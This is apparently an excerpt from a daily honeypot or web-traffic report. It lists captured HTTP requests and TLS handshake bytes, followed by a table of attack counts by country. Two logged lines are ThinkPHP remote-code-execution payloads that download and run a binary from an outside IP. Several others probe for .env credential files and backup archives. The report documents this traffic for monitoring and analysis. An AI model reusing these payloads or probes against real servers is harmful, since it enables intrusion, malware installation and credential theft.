5471GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
5481\x16\x03\x01\x00{\x01\x00\x00w\x03\x03o\x1F \xD59\x14\xEF\xA8a
5491GET /nshkarm7 HTTP/1.1
5501GET /www.rar HTTP/1.1
5511GET /web.rar HTTP/1.1
5521GET /backup.rar HTTP/1.1
5531GET /xxx.xxx.xxx.xxx.zip HTTP/1.1
5541GET /old.zip HTTP/1.1
5551GET /data.zip HTTP/1.1
5561\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xDC\xFB\x91\xE4\x12j\xF7\xB0N\xEE}\xAA\x08l\xBB\xCC\x170\xBD\x88\x13\x15\xB6\xAE\x80\x15\xDD’;\xB3\xFA\xCF\x00\x008\xC0,\xC0
5571\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03/\x13\x06\x0E\x82\x92\xC4\xCA8\x83<\x11\xA6\xA2\xBD7\xE2\xF3C\xA6~c\x03\x00\xB1\x13/&d\xFE:\xC8 \xD2+\xEC\x8B\xC3\x8E \xD8\xA3N\xC1\xB2\xAC\x04\xD0/\x1C\x06\xED\xB4k\x11\x0E\x11\x10\x019\x95\xD3K\xD8\x0C\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
5581\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03’\xD9!\xA3<C\x1F\xE3\xEB\xB4\xDA\xC9O\xC6\x96\x17\x08\x87\xDA\xED
5591GET /login/.env HTTP/1.1
5601GET /old.env HTTP/1.1
5611GET /well-known/.env HTTP/1.1
5621GET /theme/.env HTTP/1.1
5631GET /error/.env HTTP/1.1
5641GET /css/.env HTTP/1.1
5651GET /psnlink/.env HTTP/1.1
5661GET /opt/.env HTTP/1.1
5671GET /ads/.env HTTP/1.1
5681GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
5691\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBF\x19\xD6\xB6\x92\xA5\x174\x9B\xAB9q\x1B\x16\xE7`\x88\xC9\xF2^\xCB\xC1\x10\x8DV W\xD5\xB1\xFBK\xF7\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
5701\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE9!\xC5\xA3E8o\x89\x11.\xCF\xDC\x89\xD52\x93.X\xED9\xFD\xFE~\xEA2\xF9\xBET\x1E\xB5#\xCF\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
5711\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\x8F\x1A\xBA \xAA\x18\xAC\x05\xD2\x18y\xFF\xEF\xF7\x01Kw\xE9\x5C\x1D\x7F\x98%\x09Du j\xD9\xF4QO\x00\x008\xC0,\xC0
5721\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03o\x87#\xAF$v$\xC7\x88\xEA\x9An\xFFU\x8E\x19\x823
5731\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03\xE1\xCD-<\x98\x8C\xDE\xE1\x09`=\xD4\xDE/\xE3\xA4Zn\x5C\xD0d\xFC\xB2D*\xD8Lr\xF5\xB8\xE4\x04\x00\x008\xC0,\xC0
5741GET /styles/.env HTTP/1.1
5751GET /scripts/.env HTTP/1.1
5761GET /engine/.env HTTP/1.1
5771GET /environments/production/.env HTTP/1.1
5781GET /environments/local/.env HTTP/1.1
5791GET /backup.zip HTTP/1.1
5801GET /frontend/.env HTTP/1.1
5811GET /local/.env.prod HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0875NL
1552US
2201AU
3174BG
4154PL
5149GB
6134FR
7133CN
886HK
984DE
1081ES
1162TW
1256KR
1352BR
1448PT
1531AE
1627SC
1725CA
1822JP
1918UA
2016AR
2116VE
2213RU
2312IN
2410SG
2510CH
269BE
277NO
287GH
296NG
305IT
315TR
324AO
333MX
343RO
352VN
362GE
372CZ
382IR
391HU
401PH
411KH
421ID
431AZ

Related

Report: 2025-03-19
·5975 words
Repport Daily
Report: 2025-03-18
·5420 words
Repport Daily
Report: 2025-03-17
·6306 words
Repport Daily